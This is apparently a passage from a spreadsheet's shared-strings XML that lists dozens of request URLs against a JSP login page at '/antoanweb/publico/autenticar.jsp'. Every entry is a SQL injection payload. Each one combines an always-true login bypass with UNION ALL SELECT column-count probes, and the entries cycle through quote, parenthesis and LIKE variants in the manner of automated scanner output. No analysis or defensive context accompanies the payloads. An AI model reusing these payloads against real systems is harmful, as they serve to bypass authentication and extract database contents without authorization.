    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742,1742#and((('zkwy'like'zkwy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325,8325#and((('fdpq'like'fdpq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044,3044#and((('bhiv'like'bhiv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861,9861#and((('enhm'like'enhm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496,496#and((('icsy'like'icsy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913,8913#and((('mvxx'like'mvxx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213,9213#and'sgmu'like'sgmu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528,6528#and'pblz'like'pblz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103,8103#and'trzp'like'trzp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253,5253#and'vtfc'like'vtfc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732,9732#and'nnrv'like'nnrv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021,3021#and'xiqm'like'xiqm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548,7548#and'akxs'like'akxs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705,7705#and'pflr'like'pflr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157#and'ihta'like'ihta</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282,8282#and'ozam'like'ozam</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862,3862#and("ouwl"="ouwl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265,9265#and("rypd"="rypd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873,9873#and("zvyy"="zvyy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956,6956#and("ryyv"="ryyv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608,608#and("bevg"="bevg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901,5901#and("jdyf"="jdyf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782,8782#and("yhkm"="yhkm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634,6634#and("efoe"="efoe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253,6253#and("shhb"="shhb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002,3002#and("mmyi"="mmyi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830#and(("dqyv"="dqyv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943,2943#and(("hxjb"="hxjb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540#and(("kpte"="kpte</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024,5024#and(("xjhq"="xjhq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923,3923#and(("adkb"="adkb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954,2954#and(("thqc"="thqc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855,4855#and(("izzq"="izzq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872,4872#and(("vyqq"="vyqq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44#and(("emvx"="emvx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029,5029#and(("dtkj"="dtkj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411,2411#and((("ciid"="ciid</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601#and((("hdmd"="hdmd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942,9942#and((("kupm"="kupm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438,8438#and((("ipho"="ipho</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508,9508#and((("mzur"="mzur</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421,6421#and((("zmny"="zmny</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912,3912#and((("hsgc"="hsgc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345#and((("bzsq"="bzsq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375#and((("jirb"="jirb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943,4943#and((("ouzg"="ouzg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166#and"duvf"="duvf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666,1666#and"htmy"="htmy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770,9770#and"hfqw"="hfqw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801,3801#and"smnu"="smnu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562#and"ppav"="ppav</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345,7345#and"imgs"="imgs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749,749#and"npxr"="npxr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867,2867#and"cfki"="cfki</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223,1223#and"gvul"="gvul</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475,1475#and"dwzv"="dwzv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784#and("kkyc"like"kkyc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054,3054#and("zajv"like"zajv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482,5482#and("hajg"like"hajg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059#and("pdrq"like"pdrq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521#and("rfge"like"rfge</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153#and("hhef"like"hhef</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526,3526#and("jffy"like"jffy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344,9344#and("waii"like"waii</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904,1904#and("zusu"like"zusu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458,8458#and("jimr"like"jimr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881,4881#and(("boer"like"boer</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866,2866#and(("apty"like"apty</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647,647#and(("nagy"like"nagy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516,3516#and(("cydt"like"cydt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693,693#and(("iscv"like"iscv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122#and(("hyia"like"hyia</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195,5195#and(("mmte"like"mmte</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642,6642#and(("cmno"like"cmno</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792,792#and(("bwdy"like"bwdy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308,308#and(("nwsj"like"nwsj</t>
  </si>
  <si>
